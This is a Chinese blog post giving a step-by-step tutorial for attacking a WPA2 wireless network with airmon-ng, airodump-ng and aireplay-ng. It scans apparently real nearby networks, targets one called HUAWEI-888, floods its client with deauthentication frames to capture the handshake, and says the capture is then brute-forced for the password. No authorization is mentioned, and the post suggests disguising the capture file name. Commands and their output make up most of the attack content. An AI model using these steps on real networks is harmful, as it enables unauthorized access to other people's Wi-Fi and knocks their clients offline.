渗透攻击目标无线网络

1:确认网卡名称 iwconfig

2:设置监听模式:airmon-ng start wlan0

注意!

这里如果出错:ERROR adding monitor mode interface: command failed: Operation not supported (-95)。

这是博通的一个问题,可以通过以下方式解决。

sudo rmmod brcmfmac

sudo modprobe brcmfmac

3:扫描附近 WIFI:airodump-ng wlan0mon,例如扫描到以下结果:

1
2
3
4
5
6
7
8
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

58:41:20:A9:B8:F6 -82 3 0 0 1 540 WPA2 CCMP PSK TP-LINK_B8F6ZM
E2:95:49:AE:9D:CB -83 3 0 0 1 400 WPA2 CCMP PSK HUAWEI-1A1HZ3
74:45:2D:21:17:E8 -83 2 0 0 6 360 WPA2 CCMP PSK HUAWEI-888
24:06:F2:15:BB:11 -67 5 0 0 10 130 WPA2 CCMP PSK CU_PsRx
BC:54:FC:29:3E:0A -85 2 0 0 13 270 WPA2 CCMP PSK MERCURY_6413
B0:45:02:86:79:7C -81 4 0 0 6 360 WPA2 CCMP PSK HUAWEI-0E1H2P

以下例子以 74:45:2D:21:17:E8 -83 2 0 0 6 360 WPA2 CCMP PSK HUAWEI-888 为例。

4:监听某个 WIFI 的流量:airodump-ng -w tplink -c 6 --bssid 74:45:2D:21:17:E8 wlan0mon,其中 -w 就用固定值即可,伪装一下, -c 是信道,--bssid 就是我们要渗透的无线热点的MAC。

我们得到以下客户端:

1
2
3
4
5
6
7
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

74:45:2D:21:17:E8 -74 48 186 11 0 6 360 WPA2 CCMP PSK HUAWEI-888

BSSID STATION PWR Rate Lost Frames Notes Probes

74:45:2D:21:17:E8 E0:BA:AD:27:9A:00 -1 1e- 0 0 1

不要关闭这个窗口!

5:一定要新开一个窗口! 来攻击这个无线的客户端来抓取握手包,这个过程中客户端会不停的尝试连接 WIFI,网络状态是无法上网的,所以可以认为是一种另类的攻击方式,当然我们不想要攻击客户端,我们要的是渗透。
这里的 -0 代表攻击次数,可以多一点。-a 代表 WIFI 的 MAC,-c 就是这个 WIFI 下面客户端的 MAC。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ sudo aireplay-ng -0 100 -a 74:45:2D:21:17:E8 -c E0:BA:AD:27:9A:00 wlan0mon
05:35:34 Waiting for beacon frame (BSSID: 74:45:2D:21:17:E8) on channel 6
05:35:34 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:35 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:35 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:36 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:36 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 1 ACKs]
05:35:37 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:38 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:38 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 1 ACKs]
05:35:39 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:39 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:40 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:40 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:41 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:41 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:42 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]

6:回到之前的窗口,这时候我们可以看到 WIFI 状态中客户端有很多 Lost

1
2
3
4
5
6
7
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

74:45:2D:21:17:E8 -40 51 438 97 0 6 360 WPA2 CCMP PSK HUAWEI-888

BSSID STATION PWR Rate Lost Frames Notes Probes

74:45:2D:21:17:E8 E0:BA:AD:27:9A:00 -82 1e- 1 1030 29437

如果出现 WPA handshake: E0:BA:AD:27:9A:00 字样就代表握手包已经抓取到了,也会根据提示保存在 xxx.cap 文件中。

7:啊,接下去就是爆破这个 xxx.cap 文件的过程了,太黑了,就不说了,爆破完了就能获取到这个 WIFI 的连接密码。


渗透攻击目标无线网络
https://celaraze.com/2023/03/18/hack-wifi-with-kali/
作者
celaraze
发布于
2023年3月18日
许可协议